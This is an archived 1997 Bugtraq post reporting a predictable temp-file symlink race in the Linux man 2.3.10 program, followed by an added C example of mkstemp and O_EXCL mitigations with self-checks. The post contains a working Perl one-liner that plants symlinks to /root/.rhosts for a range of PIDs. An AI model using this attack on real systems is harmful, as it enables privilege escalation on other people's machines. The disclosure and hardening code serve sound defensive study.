[5855] in bugtraq


man problem

daemon@ATHENA.MIT.EDU (Thomas Fischbacher)
Wed Dec 24 17:57:39 1997

Date: 	Wed, 24 Dec 1997 13:25:14 +0100
Reply-To: Thomas Fischbacher <tf@PYSIK.TU-MUENCHEN.DE>
From: Thomas Fischbacher <tf@PYSIK.TU-MUENCHEN.DE>
To: BUGTRAQ@NETSPACE.ORG

Since this is my first posting to bugtraq, please don't flame me if
this is already known:

I just noticed a problem with the man system (version 2.3.10) on my Linux
box: /usr/man contains the .gz'd man pages:

(from /usr/man/man1:)

-rw-r--r--   1 root     root         1684 Sep 28  1995 cp.1.gz
-rw-r--r--   1 root     root         4063 Dec 29  1995 cpio.1.gz
-rw-r--r--   1 root     root           42 Oct 17  1996 cpp.1.gz

When I execute man, a temporary file containing the un-zipped manpage is
created in /tmp. The name of the tmp-file usually is "zman<PID>aaa",
e.g. "zman10849aaa". This can be exploited with a simple symlink attack:

perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}'

So when root executes man here and the pid of the man process falls in the
range 8000-11999... you know the rest.
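[Added example, not part of Thomas Fischbacher's post and not code from the man package: the two standard mitigations for the temp-file pattern he describes, written in C. The function names, the scratch directory under /tmp and the TMPDIR lookup are my own choices. create_private_tmp() lets mkstemp pick an unpredictable name and create it atomically; open_new_file_excl() shows that O_CREAT|O_EXCL refuses a pre-placed symlink even when the path is fixed. The two demo functions verify both properties inside a private directory created with mkdtemp.]

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define PATHBUF 4096

/*
 * The pattern described in the post: a fixed directory, a name derived
 * from the PID, and a plain create-or-truncate open that follows whatever
 * already sits at that path (i.e. fopen("/tmp/zman<PID>aaa", "w")).
 * Neither function below does that.
 */

/* Mitigation 1: let the C library pick an unpredictable name and create
 * the file atomically (mode 0600, O_CREAT|O_EXCL semantics).  On success
 * the generated path is written into path_out and the open fd returned. */
int create_private_tmp(char *path_out, size_t len) {
    const char *dir = getenv("TMPDIR");          /* assumed lookup order */
    if (dir == NULL || *dir == '\0') dir = "/tmp";
    if (snprintf(path_out, len, "%s/zman.XXXXXX", dir) >= (int)len) return -1;
    return mkstemp(path_out);
}

/* Mitigation 2: when a fixed path cannot be avoided, O_CREAT|O_EXCL makes
 * open() fail with EEXIST if anything already exists there.  POSIX requires
 * this even when the existing entry is a symbolic link, wherever it points,
 * so a link planted in advance is never followed. */
int open_new_file_excl(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Self-check, entirely inside a private scratch directory: place a symlink
 * under the predictable name, then confirm the hardened open refuses it and
 * that nothing was created at the link target.  Returns 1 if the
 * mitigation holds, 0 if it does not, -1 on setup failure. */
int demo_excl_refuses_symlink(void) {
    char dir[] = "/tmp/mandemo.XXXXXX";          /* constructed scratch dir */
    if (mkdtemp(dir) == NULL) return -1;

    char link[PATHBUF], target[PATHBUF];
    snprintf(link, sizeof link, "%s/zman10849aaa", dir);   /* name from the post */
    snprintf(target, sizeof target, "%s/victim", dir);      /* stand-in target */

    int result = -1;
    if (symlink(target, link) == 0) {
        errno = 0;
        int fd = open_new_file_excl(link);
        int err = errno;
        if (fd >= 0) close(fd);
        result = (fd < 0 && err == EEXIST && access(target, F_OK) != 0) ? 1 : 0;
        unlink(link);
    }
    unlink(target);
    rmdir(dir);
    return result;
}

/* Self-check for mitigation 1: the created file is a regular file, mode
 * 0600, owned by the caller.  Returns 1 on success, 0 otherwise. */
int demo_mkstemp_is_private(void) {
    char path[PATHBUF];
    int fd = create_private_tmp(path, sizeof path);
    if (fd < 0) return -1;
    struct stat st;
    int ok = fstat(fd, &st) == 0 && S_ISREG(st.st_mode)
             && (st.st_mode & 0777) == 0600 && st.st_uid == getuid();
    close(fd);
    unlink(path);
    return ok ? 1 : 0;
}

int main(void) {
    printf("O_EXCL refuses pre-placed symlink: %s\n",
           demo_excl_refuses_symlink() == 1 ? "yes" : "NO");
    printf("mkstemp file is private:           %s\n",
           demo_mkstemp_is_private() == 1 ? "yes" : "NO");
    return 0;
}
```

Note that O_EXCL only closes the symlink race for the create step; a program that later re-opens the same path by name instead of using the returned descriptor reintroduces the problem, so keep and use the fd from mkstemp() or open() for all subsequent reads and writes.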

--
     regards,                                               (o_
      Thomas Fischbacher -  tf@physik.tu-muenchen.de        //\
                                                            V_/_
